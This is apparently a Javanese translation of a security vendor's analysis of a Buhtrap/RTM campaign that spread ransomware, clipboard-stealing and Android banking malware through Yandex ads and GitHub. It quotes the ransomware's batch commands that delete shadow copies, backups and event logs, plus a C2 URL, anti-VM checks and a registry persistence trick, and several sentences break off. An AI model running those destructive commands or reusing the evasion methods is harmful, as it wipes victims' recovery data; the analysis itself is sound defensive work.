Kanggo target akuntan ing serangan cyber, sampeyan bisa nggunakake dokumen kerja sing digoleki online. Iki kira-kira sing ditindakake klompok cyber sajrone sawetara wulan kepungkur, nyebarake lawang mburi sing dikenal.
Kode sumber Buhtrap wis bocor online ing jaman kepungkur supaya sapa wae bisa nggunakake. Kita ora duwe informasi babagan kasedhiyan kode RTM.
Ing kirim iki, kita bakal ngandhani carane para panyerang nyebarake malware nggunakake Yandex.Direct lan dadi tuan rumah ing GitHub. Kiriman kasebut bakal diakhiri kanthi analisis teknis babagan malware.
Buhtrap lan RTM bali ing bisnis
Mekanisme panyebaran lan korban
Beban macem-macem sing dikirim menyang korban nuduhake mekanisme panyebaran umum. Kabeh file jahat sing digawe dening panyerang dilebokake ing rong repositori GitHub sing beda.
Biasane, gudang ngemot siji file jahat sing bisa didownload, sing asring diganti. Wiwit GitHub ngidini sampeyan ndeleng riwayat owah-owahan ing repositori, kita bisa ndeleng malware apa sing disebarake sajrone wektu tartamtu. Kanggo ngyakinake korban supaya ngundhuh file jahat, situs web blanki-shabloni24[.]ru, sing ditampilake ing gambar ing ndhuwur, digunakake.
Desain situs lan kabeh jeneng file angkoro ngetutake konsep siji - formulir, template, kontrak, conto, lan liya-liyane. Ngelingi yen piranti lunak Buhtrap lan RTM wis digunakake ing serangan akuntan ing jaman kepungkur, kita nganggep manawa strategi ing kampanye anyar padha. Pitakonan mung kepiye carane korban tekan situs penyerang.
Infèksi
Paling ora sawetara korban potensial sing rampung ing situs iki kepincut dening iklan angkoro. Ing ngisor iki conto URL:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Nalika sampeyan bisa ndeleng saka link, banner iki dikirim ing forum accounting sah bb.f2[.]kz. Wigati dimangerteni manawa spanduk kasebut muncul ing macem-macem situs, kabeh duwe id kampanye sing padha (blanki_rsya), lan sing paling gegandhengan karo layanan akuntansi utawa pitulungan hukum. URL kasebut nuduhake yen calon korban nggunakake panjalukan "download formulir invoice," sing ndhukung hipotesis serangan sing ditargetake. Ing ngisor iki ana situs sing muncul spanduk lan pitakon telusuran sing cocog.
- download formulir invoice – bb.f2[.]kz
- kontrak sampel - Ipopen[.]ru
- sampel complaint aplikasi - 77metrov[.]ru
- wangun persetujuan - blank-dogovor-kupli-prodazhi[.]ru
- conto petisi pengadilan - zen.yandex[.]ru
- keluhan sampel - yurday[.]ru
- formulir kontrak sampel – Regforum[.]ru
- wangun kontrak – assistentus [.]ru
- conto persetujuan apartemen - napravah[.]com
- conto kontrak legal - avito[.]ru
Situs blanki-shabloni24[.]ru bisa uga wis dikonfigurasi kanggo ngliwati penilaian visual sing prasaja. Biasane, iklan sing nuduhake situs sing katon profesional kanthi pranala menyang GitHub ora katon kaya sing ora apik. Kajaba iku, panyerang ngunggah file jahat menyang repositori mung kanggo wektu sing winates, bisa uga sajrone kampanye. Umume wektu, gudang GitHub ngemot arsip zip kosong utawa file EXE kosong. Mangkono, panyerang bisa nyebarake iklan liwat Yandex.Direct ing situs sing paling kerep dibukak dening akuntan sing teka kanggo nanggepi pitakon panelusuran tartamtu.
Sabanjure, ayo deleng macem-macem payload sing disebarake kanthi cara iki.
Analisis Payload
Kronologi distribusi
Kampanye angkoro diwiwiti ing pungkasan Oktober 2018 lan aktif nalika nulis. Amarga kabeh repositori kasedhiya kanggo umum ing GitHub, kita nyusun garis wektu sing akurat babagan distribusi enem kulawarga malware sing beda (pirsani gambar ing ngisor iki). Kita wis nambahake garis sing nuduhake nalika link spanduk ditemokake, sing diukur nganggo telemetri ESET, kanggo mbandhingake karo sejarah git. Kaya sing sampeyan ngerteni, iki cocog karo kasedhiyan muatan ing GitHub. Penyimpangan ing pungkasan Februari bisa diterangake kanthi kasunyatan manawa kita ora duwe bagean saka riwayat owah-owahan amarga repositori wis dibusak saka GitHub sadurunge bisa entuk kanthi lengkap.
Gambar 1. Kronologi distribusi malware.
Sertifikat Penandatanganan Kode
Kampanye nggunakake pirang-pirang sertifikat. Sawetara ditandatangani dening luwih saka siji kulawarga malware, sing luwih nuduhake manawa conto beda kalebu kampanye sing padha. Senadyan kasedhiyan kunci pribadi, operator ora mlebu kanthi sistematis binari lan ora nggunakake kunci kanggo kabeh conto. Ing pungkasan Februari 2019, panyerang wiwit nggawe teken sing ora bener nggunakake sertifikat sing diduweni Google sing ora duwe kunci pribadi.
Kabeh sertifikat sing melu kampanye lan kulawarga malware sing ditandatangani didaftar ing tabel ing ngisor iki.
Kita uga wis nggunakake sertifikat tandha kode iki kanggo nggawe pranala karo kulawarga malware liyane. Kanggo umume sertifikat, kita ora nemokake conto sing ora disebarake liwat repositori GitHub. Nanging, sertifikat "MARIYA" TOV digunakake kanggo mlebu malware sing ana ing botnet
Win32/Filecoder.Buhtrap
Komponen pisanan sing narik kawigaten kita yaiku Win32 / Filecoder.Buhtrap sing mentas ditemokake. Iki minangka file biner Delphi sing kadhangkala dikemas. Iki disebarake utamane ing Februari-Maret 2019. Tumindak kaya sing cocog karo program ransomware - nggoleki drive lokal lan folder jaringan lan ngenkripsi file sing ditemokake. Ora perlu sambungan Internet kanggo kompromi amarga ora ngubungi server kanggo ngirim kunci enkripsi. Nanging, nambah "token" menyang mburi pesen tebusan, lan nyaranake nggunakake email utawa Bitmessage kanggo ngubungi operator.
Kanggo ngenkripsi sumber daya sensitif sabisa, Filecoder.Buhtrap nglakokake thread sing dirancang kanggo mateni piranti lunak kunci sing bisa mbukak panangan file sing ngemot informasi penting sing bisa ngganggu enkripsi. Proses target utamane sistem manajemen basis data (DBMS). Kajaba iku, Filecoder.Buhtrap mbusak file log lan serep kanggo nggawe Recovery data angel. Kanggo nindakake iki, mbukak script kumpulan ing ngisor iki.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap nggunakake layanan Logger IP online sing sah sing dirancang kanggo ngumpulake informasi babagan pengunjung situs web. Iki dimaksudake kanggo nglacak korban ransomware, sing dadi tanggung jawab baris perintah:
mshta.exe "javascript:document.write('');"
File kanggo enkripsi dipilih yen ora cocog karo telung dhaptar pengecualian. Kaping pisanan, file kanthi ekstensi ing ngisor iki ora dienkripsi: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys lan .bat. Kapindho, kabeh file sing path lengkap ngemot senar direktori saka dhaptar ing ngisor iki ora kalebu.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Katelu, jeneng file tartamtu uga ora kalebu saka enkripsi, ing antarane yaiku jeneng file pesen tebusan. Dhaptar kapacak ing ngisor iki. Temenan, kabeh pangecualian kasebut ditujokake supaya mesin tetep mlaku, nanging kanthi minimal roadworthiness.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Skema enkripsi file
Sawise dieksekusi, malware kasebut ngasilake pasangan kunci RSA 512-bit. Eksponen pribadhi (d) lan modulus (n) banjur dienkripsi nganggo kunci publik 2048-bit hard-coded (eksponen publik lan modulus), zlib-packed, lan base64 encoded. Kode sing tanggung jawab kanggo iki ditampilake ing Gambar 2.
Gambar 2. Hasil dekompilasi Hex-Rays proses generasi pasangan kunci RSA 512-bit.
Ing ngisor iki conto teks biasa kanthi kunci pribadi sing digawe, yaiku token sing dipasang ing pesen tebusan.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Kunci umum penyerang diwenehi ing ngisor iki.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
File kasebut dienkripsi nggunakake AES-128-CBC kanthi kunci 256-bit. Kanggo saben file sing dienkripsi, kunci anyar lan vektor inisialisasi anyar digawe. Informasi kunci ditambahake ing mburi file sing dienkripsi. Ayo dipikirake format file sing dienkripsi.
File sing dienkripsi nduweni header ing ngisor iki:
Data file sumber kanthi tambahan nilai sihir VEGA dienkripsi menyang bita 0x5000 pisanan. Kabeh informasi dekripsi dilampirake menyang file kanthi struktur ing ngisor iki:
- Penanda ukuran file ngemot tandha sing nuduhake manawa file luwih gedhe tinimbang ukuran 0x5000 bita
— Gumpalan tombol AES = ZlibCompress(RSAEncrypt(tombol AES + IV, kunci umum saka pasangan kunci RSA sing digawe))
- Gumpalan kunci RSA = ZlibCompress(RSAEncrypt(kunci pribadhi RSA sing digawe, kunci publik RSA kanthi kode keras))
Win32/ClipBanker
Win32/ClipBanker minangka komponen sing disebarake kanthi intermiten wiwit akhir Oktober nganti awal Desember 2018. Perané kanggo ngawasi isi clipboard, nggoleki alamat dompet cryptocurrency. Sawise nemtokake alamat dompet target, ClipBanker ngganti karo alamat sing dipercaya dadi operator. Sampel sing ditliti ora ana ing kothak utawa ora dibuwang. Mekanisme mung sing digunakake kanggo masking prilaku yaiku enkripsi senar. Alamat dompet operator dienkripsi nggunakake RC4. Target cryptocurrencies yaiku Bitcoin, awis Bitcoin, Dogecoin, Ethereum lan Ripple.
Sajrone periode malware nyebar menyang dompet Bitcoin panyerang, jumlah cilik dikirim menyang VTS, sing nggawe keraguan babagan sukses kampanye kasebut. Kajaba iku, ora ana bukti sing nuduhake yen transaksi kasebut ana hubungane karo ClipBanker.
Win32/RTM
Komponen Win32/RTM disebarake sawetara dina ing awal Maret 2019. RTM minangka bankir Trojan sing ditulis ing Delphi, ngarahake kanggo sistem perbankan remot. Ing 2017, peneliti ESET nerbitake
Buhtrap Loader
Kanggo sawetara wektu, downloader kasedhiya ing GitHub sing ora padha karo alat Buhtrap sadurunge. Panjenenganipun nguripake kanggo https://94.100.18[.]67/RSS.php?<some_id>
kanggo entuk tataran sabanjure lan mbukak langsung menyang memori. Kita bisa mbedakake loro prilaku kode tataran kapindho. Ing URL pisanan, RSS.php ngliwati backdoor Buhtrap langsung - backdoor iki meh padha karo sing kasedhiya sawise kode sumber bocor.
Apike, kita ndeleng sawetara kampanye karo backdoor Buhtrap, lan padha diduga mbukak dening operator beda. Ing kasus iki, prabédan utama yaiku lawang mburi dimuat langsung menyang memori lan ora nggunakake skema biasa karo proses panyebaran DLL sing kita rembugan.
Prilaku kapindho, sing luwih rumit yaiku URL RSS.php dikirim menyang loader liyane. Iki ngetrapake sawetara kebingungan, kayata mbangun maneh tabel impor dinamis. Tujuan bootloader yaiku ngubungi server C&C
Android/Spy.Banker
Apike, komponen kanggo Android uga ditemokake ing repositori GitHub. Dheweke ana ing cabang utama mung sedina - 1 November 2018. Saliyane dikirim ing GitHub, telemetri ESET ora nemokake bukti manawa malware iki disebarake.
Komponen kasebut di-host minangka Paket Aplikasi Android (APK). Iku banget obfuscated. Prilaku ala didhelikake ing JAR sing dienkripsi sing ana ing APK. Iki dienkripsi nganggo RC4 nggunakake tombol iki:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Tombol lan algoritma sing padha digunakake kanggo encrypt strings. JAR dumunung ing APK_ROOT + image/files
. 4 bait pisanan file ngemot dawa JAR sing dienkripsi, sing diwiwiti langsung sawise kolom dawa.
Sawise dekripsi file kasebut, kita nemokake manawa iku Anubis - sadurunge
- ngrekam mikropon
- njupuk gambar
- njupuk koordinat GPS
- keylogger
- enkripsi data piranti lan panjaluk tebusan
- ngirim spam
Sing nggumunake, bankir kasebut nggunakake Twitter minangka saluran komunikasi serep kanggo entuk server C&C liyane. Sampel sing dianalisis nggunakake akun @JonesTrader, nanging nalika analisa wis diblokir.
Bankir ngemot dhaptar aplikasi target ing piranti Android. Luwih dawa tinimbang dhaptar sing dipikolehi ing sinau Sophos. Dhaptar kasebut kalebu akeh aplikasi perbankan, program blanja online kayata Amazon lan eBay, lan layanan cryptocurrency.
MSIL/ClipBanker.IH
Komponen pungkasan sing disebarake minangka bagéan saka kampanye iki yaiku .NET Windows executable, sing muncul ing Maret 2019. Akèh-akèhé versi sing ditliti dirangkep nganggo ConfuserEx v1.0.0. Kaya ClipBanker, komponen iki nggunakake clipboard. Tujuane yaiku macem-macem cryptocurrencies, uga nawakake ing Steam. Kajaba iku, dheweke nggunakake layanan IP Logger kanggo nyolong kunci WIF pribadi Bitcoin.
Mekanisme pangayoman
Saliyane keuntungan sing diwenehake ConfuserEx kanggo nyegah debugging, mbuwang, lan gangguan, komponen kasebut kalebu kemampuan kanggo ndeteksi produk antivirus lan mesin virtual.
Kanggo verifikasi manawa mlaku ing mesin virtual, malware nggunakake baris perintah (WMIC) Windows WMI sing dibangun kanggo njaluk informasi BIOS, yaiku:
wmic bios
Banjur program parses output printah lan nggoleki tembung kunci: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Kanggo ndeteksi produk antivirus, malware ngirim panjalukan Windows Management Instrumentation (WMI) menyang Pusat Keamanan Windows nggunakake ManagementObjectSearcher
API minangka kapacak ing ngisor iki. Sawise dekoding saka base64 telpon katon kaya iki:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Gambar 3. Proses kanggo ngenali produk antivirus.
Kajaba iku, malware mriksa apa
Ketekunan
Versi malware sing kita sinau nyalin dhewe %APPDATA%googleupdater.exe
lan nyetel atribut "didhelikake" kanggo direktori google. Banjur dheweke ngganti nilai SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell
ing pendaptaran Windows lan nambah path updater.exe
. Kanthi cara iki, malware bakal dieksekusi saben pangguna mlebu.
Tumindak ala
Kaya ClipBanker, malware ngawasi isi clipboard lan nggoleki alamat dompet cryptocurrency, lan yen ditemokake, ngganti karo salah sawijining alamat operator. Ing ngisor iki dhaptar alamat target adhedhasar apa sing ditemokake ing kode kasebut.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Kanggo saben jinis alamat ana ekspresi reguler sing cocog. Nilai STEAM_URL digunakake kanggo nyerang sistem Steam, kaya sing bisa dideleng saka ekspresi reguler sing digunakake kanggo nemtokake ing buffer:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Saluran eksfiltrasi
Saliyane ngganti alamat ing buffer, malware nargetake kunci WIF pribadi saka dompet Bitcoin, Bitcoin Core lan Electrum Bitcoin. Program kasebut nggunakake plogger.org minangka saluran exfiltrasi kanggo entuk kunci pribadi WIF. Kanggo nindakake iki, operator nambahake data kunci pribadi menyang header HTTP User-Agent, kaya sing kapacak ing ngisor iki.
Gambar 4. IP Logger console karo data output.
Operator ora nggunakake iplogger.org kanggo exfiltrate dompet. Dheweke bisa uga nggunakake cara sing beda amarga watesan 255 karakter ing lapangan User-Agent
ditampilake ing antarmuka web IP Logger. Ing conto sing kita sinau, server output liyane disimpen ing variabel lingkungan DiscordWebHook
. Kaget, variabel lingkungan iki ora ditugasake ing endi wae ing kode kasebut. Iki nuduhake manawa malware isih dikembangake lan variabel kasebut ditugasake menyang mesin uji operator.
Ana tandha liyane yen program kasebut lagi dikembangake. File binar kalebu loro URL iplogger.org, lan loro-lorone ditakoni nalika data dieksfiltrasi. Ing panyuwunan menyang salah sawijining URL kasebut, nilai ing kolom Referer didhisiki "DEV /". Kita uga nemokake versi sing ora dikemas nggunakake ConfuserEx, panampa kanggo URL iki jenenge DevFeedbackUrl. Adhedhasar jeneng variabel lingkungan, kita yakin manawa operator ngrancang nggunakake layanan Discord sing sah lan sistem interception web kanggo nyolong dompet cryptocurrency.
kesimpulan
Kampanye iki minangka conto panggunaan layanan iklan sing sah ing serangan cyber. Skema kasebut target organisasi Rusia, nanging kita ora bakal kaget ndeleng serangan kasebut nggunakake layanan non-Rusia. Kanggo ngindhari kompromi, pangguna kudu yakin karo reputasi sumber piranti lunak sing diunduh.
Dhaptar lengkap indikator kompromi lan atribut MITRE ATT&CK kasedhiya ing
Source: www.habr.com